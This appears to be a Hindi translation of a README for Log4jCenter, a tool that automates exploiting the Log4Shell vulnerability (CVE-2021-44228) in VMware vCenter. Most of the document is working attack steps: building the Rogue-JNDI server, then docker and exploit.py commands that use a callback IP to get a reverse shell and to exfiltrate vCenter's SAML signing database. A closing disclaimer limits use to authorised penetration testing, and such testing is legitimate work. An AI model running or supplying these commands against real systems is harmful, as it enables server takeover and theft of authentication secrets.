
vCenter में CVE-2021-44228 का दोहन करके रिमोट कोड निष्पादन और भी बहुत कुछ।
vCenter में CVE-2021-44228 का दोहन करके रिमोट कोड एक्ज़ीक्यूशन और बहुत कुछ। शोषण का विवरण देने वाला ब्लॉग पोस्ट नीचे दिया गया है:
इस कमज़ोरी के प्रूफ ऑफ कॉन्सेप्ट (PoC) बिखरे हुए हैं और इन्हें मैन्युअल रूप से निष्पादित करना पड़ता है। यह रिपॉज़िटरी शोषण प्रक्रिया को स्वचालित करती है और शोषण के बाद संभव होने वाले एक अतिरिक्त अटैक पथ को भी प्रदर्शित करती है।
इस रिपॉज़िटरी का उपयोग मैन्युअल रूप से या Docker के साथ किया जा सकता है।
शोषण को मैन्युअल रूप से डाउनलोड करने और चलाने के लिए, निम्नलिखित चरणों को निष्पादित करें। सबसे पहले, सुनिश्चित करें कि आपके अटैकिंग होस्ट पर Java और Maven स्थापित हैं। Debian-आधारित ऑपरेटिंग सिस्टम पर apt का उपयोग करके ऐसा करने के लिए, निम्न कमांड चलाएँ:
apt update && apt install openjdk-11-jre maven
GitHub रिपॉज़िटरी को क्लोन करें और सभी python आवश्यकताएँ स्थापित करें:
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
&& cd Log4jCenter && pip3 install -r requirements.txt
Log4jCenter रिपॉज़िटरी के रूट से, नीचे दिए गए कमांड का उपयोग करके Rogue-Jndi प्रोजेक्ट को कंपाइल करें:
mvn package -f utils/rogue-jndi/
पहले, सुनिश्चित करें कि आपके अटैकिंग होस्ट पर Docker स्थापित है। (मैं आपको यह करने का तरीका नहीं बताऊँगा)
उसके बाद, रिपॉज़िटरी को क्लोन करने और जिस Docker इमेज का हम उपयोग करेंगे उसे बनाने के लिए निम्नलिखित कमांड निष्पादित करें।
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
&& cd Log4jCenter && docker build -t log4jcenter .
कंटेनर चलाने के लिए, अपने कमांड लाइन फ़्लैग्स जोड़कर निम्नलिखित जैसा कमांड चलाएँ। उदाहरण के लिए, नीचे दिया गया कमांड vCenter का शोषण करने और रिवर्स शेल पाने के लिए उपयोग किया जाएगा। ध्यान दें कि कंटेनर रिवर्स शेल को कैप्चर नहीं करेगा। आपको एक अलग शेल सेशन में ncat लिसनर बनाना होगा:
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 8090:8090 -p 1389:1389 log4jcenter \
-t 10.100.100.1 -i 192.168.1.1 -p 4444 -r
usage: exploit.py [-h] -t IP -i CALLBACK [-p PORT] [-e] [-r]
optional arguments:
-h, --help show this help message and exit
-t IP, --target IP vCenter Host IP
-i CALLBACK, --ip CALLBACK
Callback IP for payload delivery and reverse shell.
-p PORT, --port PORT Callback port for reverse shell.
-e, --exfiltrate Module to pull SAML DB
-r, --revshell Module to establish reverse shell
अपने लोकल सिस्टम पर स्थापित टूल का उपयोग करके रिवर्स शेल प्राप्त करें:
python3 exploit.py -t vcenter.acme.com -i 10.10.10.1 -p 4444 -r
Docker कंटेनर के भीतर से SAML साइनिंग डेटाबेस को एक्सफ़िल्ट्रेट करें:
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 1389:1389 -p 8090:8090 log4jcenter \
-t 10.100.100.1 -i 192.168.1.1 -e
यह टूल पेनेट्रेशन टेस्टिंग के दौरान उपयोग के लिए डिज़ाइन किया गया है; पूर्व पारस्परिक सहमति के बिना लक्ष्यों पर हमला करने के लिए इस टूल का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की ज़िम्मेदारी है। डेवलपर्स कोई दायित्व नहीं लेते हैं और इस प्रोग्राम के किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।